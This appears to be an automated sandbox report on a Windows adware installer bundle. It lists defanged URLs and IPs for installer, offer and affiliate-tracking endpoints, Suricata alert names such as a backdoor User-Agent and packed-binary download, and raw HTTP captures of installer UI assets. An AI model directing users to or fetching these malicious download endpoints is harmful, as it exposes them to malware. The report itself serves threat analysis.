hxxp://when.legtest.bidhxxp://when.legtest.bid/installer.php?affId=2601&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&trackingId=237110129&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.222.149.173
hxxp://when.legtest.bidhxxp://when.legtest.bid/offer.php?affId=2601&trackingId=237110129&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.222.149.173
hxxp://birth.babieshistory.bid/stub_maker_uk2.php?url=hxxp://tragony.info/taveara?q=Installation	52.222.149.74
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif	52.222.149.122
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif	52.222.149.122
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png	52.222.149.17
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png	52.222.149.17
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png	52.222.149.122
hxxp://cdn1.downloadjelly.com/V39/amipb.js	52.222.149.118
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html	52.222.149.17
hxxp://www.1-1ads.com/js/show_ads_supp.js?pubId=5103	212.124.115.196
hxxp://disk.thingunit.bidhxxp://disk.thingunit.bid/aff_c?offer_id=4&aff_id=2601&source=2519&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1280881289&url=http://when.legtest.bid/offer.php?affId={aff_id}&trackingId=237110129&instId=2519&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.48.172.184
hxxp://www.secularistsarakolet.site/index.php	54.243.162.153
hxxp://www.1-1ads.com/impression.gif?b=118203&p=5103&ch=&ad.trans.id=ammxbq72zzmp&ap=&wp=&cps=&c=10001&l=UA&h=8f136e40c877dac2422c2d2be7acf039&t=1496798091061&s=e0edce0204b209db8a0c76b02a2aefea&tz=3.0&sh=902&sw=1916&o=	212.124.115.196
hxxp://wac.a164.taucdn.net/80A164/n135-cdn/files135/65/10001/118203/FB_RU_800_Group1A.jpg	93.184.220.20
hxxp://meat.detailrobin.bid/?affId=1006&appTitle=Installation&s1=201&s2=320779&setupName=cpSetup&appVersion=2.92&instId=11&exe=1	52.222.149.194
hxxp://trk2.wlpreexactiontr.bid/08e0b779-c1db-404a-b9a2-b4657d709f22	52.58.250.174
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif	52.222.149.122
hxxp://www.1-1ads.com/ads-async.js?v=1&key=3a71f57f6d976f956c5f61dbdd4adf7b&tarId=3a71f57f6d976f956c5f61dbdd4adf7b_sync&cIds=&adsCampaignKey=1496798089125&ch=&click=&tz=3&t=1496798091303&requestUrl=http://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html&flashVer=23.0 r0&inDapIF=false&supp_width=320&supp_height=50&scrWidth=1916&scrHeight=902	212.124.115.196
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCB4rVb3FyuQ1	216.58.214.238
hxxp://g.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACEAEAISWIsPpZp3fvBXtmJ98=	23.37.43.27
hxxp://www.traktrafficflow.com/?a_aid=65f4g4dfgsdfb1dfgh&page=m-2-panther&clickid=10200827de76ab08c4097a34ad51ad&pubid=6929&aff_sub=PUBLISHER-ID	192.230.96.165
hxxp://tracking.revimedia.com/aff_c?offer_id=1199&aff_id=6929&aff_sub=PUBLISHER-ID&aff_sub2=CLICK-ID&aff_sub3=Default3	52.18.192.224
hxxp://when.legtest.bidhxxp://when.legtest.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=201&aff_sub2=320779&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1078188741&url=http://when.legtest.bid/offer.php?affId={aff_id}&trackingId=237110129&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.222.149.173
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif	52.222.149.122
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif	52.222.149.122
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png	52.222.149.122
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png	52.222.149.17
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif	52.222.149.122
hxxp://crl.geotrust.com/crls/secureca.crl	23.37.37.163
hxxp://www.bringmethefile.com/xdownload.php?version=1.1.5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png	54.243.162.153
hxxp://www.1-1ads.com/js/show_ads_supp.js?pubId=907	212.124.115.196
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css	52.222.149.17
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif	52.222.149.122
hxxp://wake.tendencyrhythm.bidhxxp://wake.tendencyrhythm.bid/installer.php?affId=2601&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&trackingId=237110129&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	54.88.21.193
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCB2EeaQNimqU	216.58.214.238
hxxp://buddy.bellverse.bid/get.php?ses=gEsz9JGrJC2fqloQnyLiA	52.222.149.188
hxxp://cdn2.downloadjelly.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css	52.222.149.122
dns.msftncsi.com	131.107.255.255
pe-sixi.com	69.197.35.236
ssl.gstatic.com	216.58.214.227
clients1.google.com.ua	216.58.214.227
teredo.ipv6.microsoft.com	157.56.120.207

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN Backdoor User-Agent (InstallCapital)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE SoundCloud Downloader Install Beacon

Traffic

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2881

Connection: keep-alive

Date: Thu, 30 Mar 2017 03:53:06 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "d9f00c86bfa3e08e905128b131229fac"

Content-Disposition: attachment; filename="cancel1.gif"

Accept-Ranges: bytes

Server: AmazonS3

Age: 51534

X-Cache: Hit from cloudfront

Via: 1.1 4d1cbe225c5d30aa78ec9a6fa1ba4211.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 28QE2OIgXGahxJWU63FhPzbCYdeL3LHqMpRKlGSCc99pMH5I6_qUpA==
GIF89ae......@.H*.-<.AC.K=.F>.H'. ;.B,./=.E)./)..@.I=.D=.D?.GC.M
>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)&
gt;.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).
1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..
,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&
.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.
A<.G4.9 .05.<C.F6.;;.I@.I".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A
 ./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp...................
......................................................................
......................................................................
......................................................................
......................................................................
.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTcz
kc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP C
ore 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF x
mlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Des
cription rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:x
mpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.co
m/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Wi
ndows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xm
pMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1740

Connection: keep-alive

Date: Thu, 30 Mar 2017 02:52:23 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "7c96892b1948a6e97494e2d58cafe1c0"

Content-Disposition: attachment; filename="skip.gif"

Accept-Ranges: bytes

Server: AmazonS3

Age: 51545

X-Cache: Hit from cloudfront

Via: 1.1 4d1cbe225c5d30aa78ec9a6fa1ba4211.cloudfront.net (CloudFront)

X-Amz-Cf-Id: LVVj8bEjgxe7gifhOuBfjrWNoE93iT_Qfoxp0GoOplmmIuUSogT7fg==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...........!.......,....e........|"E......*\......?...)....3j...... Cb
.....R...\.....0c..I.&K8q........@...J....>...C...:P.J.J.*U.X.:....
..`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.
3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f.
.$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........
f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......
D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x....
...F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|
...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.
4.I...R.....m$.A............".T..%.pPC./.@....P.".......!.%......v.1..
.4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 3033

Connection: keep-alive

Date: Thu, 30 Mar 2017 03:27:27 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "3484f982bbd281ea323f9dedb47098ed"

Content-Disposition: attachment; filename="accept.gif"

Accept-Ranges: bytes

Server: AmazonS3

Age: 51534

X-Cache: Hit from cloudfront

Via: 1.1 4d1cbe225c5d30aa78ec9a6fa1ba4211.cloudfront.net (CloudFront)

X-Amz-Cf-Id: ZNBKCFAVld71GN4IsH20p-plw7MukhR07GhyYMo_Jeqx6__BzCeurw==
GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww
?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*.-=.E@.H<.A)..@.IC
.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}.
.o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C
...H.KL.P..................[._&. ...........................|.~......(
.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m..
.......I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8
(.,A.K......C.I%.*..2?.Hgug).1E.Kn.o@.I-.4E.I>.F=.D6.;...'.)*.(*./-
.-?.=-..:.C../<.C...5.<=.B?.C...9.@9.A:.A,.2;.B;.BQ.\...O.Tkyl/.
3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K
#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|....
.....hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!.
.XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c
011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf=
"hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description 
rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef
="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns
.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E41
1B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150
F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" x
mp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2157

Connection: keep-alive

Date: Thu, 22 Sep 2016 19:34:06 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"

Content-Disposition: attachment; filename="finish.gif"

Accept-Ranges: bytes

Server: AmazonS3

Age: 80686

X-Cache: Hit from cloudfront

Via: 1.1 4d1cbe225c5d30aa78ec9a6fa1ba4211.cloudfront.net (CloudFront)

X-Amz-Cf-Id: f5fsdBk65XMmytjvFGarZRjrdglYgtZfzYcOeUZx6ZMu0zDZqQZq0g==
GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-
)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43
.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.
C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!.&#.)&..%. 
".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,
.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<
;4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B
8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D
.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~..........
..................................$.('. %.)4.9).,).-*.. .-).  .. .-*.-
-.10.41.5/.22.44.86.:C.HG.IH.L_.b.....................................
........'.(*.*(.)-../.0-.->.>C.E........................,.  .&..
................uuu...!.......,....e..........'......*\.........'.....
f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U
.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL.
.......2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<....
.G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h.....
.>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....&l
t;........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p
.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...
b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."
....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 10029

Connection: keep-alive

Date: Sun, 28 May 2017 15:20:08 GMT

Last-Modified: Sun, 28 May 2017 15:14:17 GMT

ETag: "0938eb70bc6454ad51a4c40399ae5ad4"

Accept-Ranges: bytes

Server: AmazonS3

Age: 35526

X-Cache: Hit from cloudfront

Via: 1.1 1d0fc03b30809d10a25a905ba30d8170.cloudfront.net (CloudFront)

X-Amz-Cf-Id: a74HJcud7M4hkEQ9tLeKfcpk71_i9XAj1_JRgR95_mn3X1WkoV1_VA==
body {...    font-size:10px;..    background:#eaeaea;..    font-family
: Arial;..    margin: 0;..    padding: 0;..    color:#000000;        .
.}..div, span, textarea {..    cursor: default;..}..a, a span, a div {
..    cursor: pointer;..}../* whole screen styles   */...ami-wrapper{.
.   background : none no-repeat scroll 0 0 #eaeaea;..   border:2px sol
id #989898; ..}../* moddle element */..#ami-body..{...position: relati
ve;..    padding-left:27;..    padding-right:27;..}...bottom-line{..  
  background-color:#5cafd4;..    height:45px;..    width:100%;..}..tab
le {..    border-collapse: collapse;..    margin: 0 ;..    padding: 0;
..    font-size:10px;..}..textarea {...font-size:10px;...font-family: 
verdana;...width:98%;...padding: 5px;..}...textarea1{..    background:
#ffffff;..    color:#000000;..    height:100%;..    width:100%;..    o
verflow-x:hidden;..}..td{..    padding: 0px;..}../* footer and footer 
buttons */...bottom-holder{..    background-image:url('footer_img.png'
);..    background-repeat:repeat-x;..    height:59px;..    position:ab
solute;..    bottom:0px;..    padding-left:20px;..    padding-right:20
px;..}....#btnNext{..    background:  url('next.gif') no-repeat;..}..#
btnCancel{..    background:  url('cancel.gif') no-repeat;..}../* Use f
or cancle with no popup !!! */..#btnBack{..    background:  url('cance
l1.gif') no-repeat;..}..#btnDecline{..    background:  url('decline.gi
f') no-repeat;..}..#btnAccept{..    background:  url('accept.gif') no-
repeat;..}..#btnSkip{..    background:  url('skip.gif') no-repeat;
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 937

Connection: keep-alive

Date: Thu, 22 Sep 2016 19:34:02 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "e2bf2d203887961a2e93c1a68b7e7534"

Content-Disposition: attachment; filename="footer_img.png"

Accept-Ranges: bytes

Server: AmazonS3

Age: 80688

X-Cache: Hit from cloudfront

Via: 1.1 1d0fc03b30809d10a25a905ba30d8170.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 4vru0U1sY3rq9892BIEM3pq2J_oligZtRfxc2vOChJRXzqf87QBJog==
.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e&
lt;...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8
E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"&g
t; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397D
FE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B
910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
 <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.
]l....IEND.B`.....


GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1262

Connection: keep-alive

Date: Thu, 22 Sep 2016 19:34:03 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"

Content-Disposition: attachment; filename="cancel.gif"

Accept-Ranges: bytes

Server: AmazonS3

Age: 80688

X-Cache: Hit from cloudfront

Via: 1.1 1d0fc03b30809d10a25a905ba30d8170.cloudfront.net (CloudFront)

X-Amz-Cf-Id: lJEXIq6E3tAoFahzyfP902fMJGKF1lWCqxmonZjWiOz78Cs4cCOv_w==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....u.,....e........o
t.............o..nC.............GCn.t.D.............BC.EF.............
EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*...
.!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY
.....K....c...Vg,.......f. 0.k... \..b.. L..@.J...)U.U.b......W.0.....
.t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........
Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. .............
.................. }.J0...&x...f...-......AH.]pa..(..".A....=.(....p..
..X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P.
.P.@..t..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t.......
.....!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt..
....m...k..........n.f.AH...k...............p..../.......7.....!...Wl.
K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t.
...L7...s....;....
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1293

Connection: keep-alive

Date: Thu, 22 Sep 2016 19:34:04 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "137a96f0655570ffdf65ae14dad52404"

Content-Disposition: attachment; filename="decline.gif"

Accept-Ranges: bytes

Server: AmazonS3

Age: 80687

X-Cache: Hit from cloudfront

Via: 1.1 1d0fc03b30809d10a25a905ba30d8170.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 3gn2fMFGFpQJPOdG-wi0pchW_dDlbW7A8TtDonmxFQSw6L5lYHqPVw==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....t.,....e........n
s.............n..mB.............FBm.s.C.............AB.DE.............
DDI.GGF.............G.I.........(.....HJ.LML..........%....8...z.J.\..
a.%N.5qB......8...F......H..F...$)..e.&P.A.I....37>......Ax..JT.N%D
..\....)..H.J..U...H..u...[.... ..&/H.{!%.V.m...X0...)Se.......W.P!D.J
.... ^.a@..T..(.........B.E....4.<Z4..-2..r....7L.....m*W.Y........
..Nc...<.x..a.....Do..........;........{......_.>.. ..3(p....W._
9p........{.........z... {[.....Vh...F0@..vX..Y.....D.E..v.!. f.".%j..
.#bh#._....[....@.)..@.1..[.....L2YD...I..C.X...H@..M2.D.`.....|...h..
..^.0@.pv.D..`...S.........o....z....7......9.!b.!...Vji. .... ....`&l
t;A'..f...T....=......:....0A.[$0@.>......{....a...&.....8@........
a...&`...6.l.bP0....;n._. B...@.....l...a.......d......,....k......!h4
....G....Wl.j..g....w.q.g.2..$.l..(....,....0..s.4..r......<....6.-
t.?.m4.l.<G.o....PG-..TWM..M[...P....X...$d.m..g..@ .;....
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2157

Connection: keep-alive

Date: Thu, 22 Sep 2016 19:34:04 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"

Content-Disposition: attachment; filename="next.gif"

Accept-Ranges: bytes

Server: AmazonS3

Age: 80688

X-Cache: Hit from cloudfront

Via: 1.1 1d0fc03b30809d10a25a905ba30d8170.cloudfront.net (CloudFront)

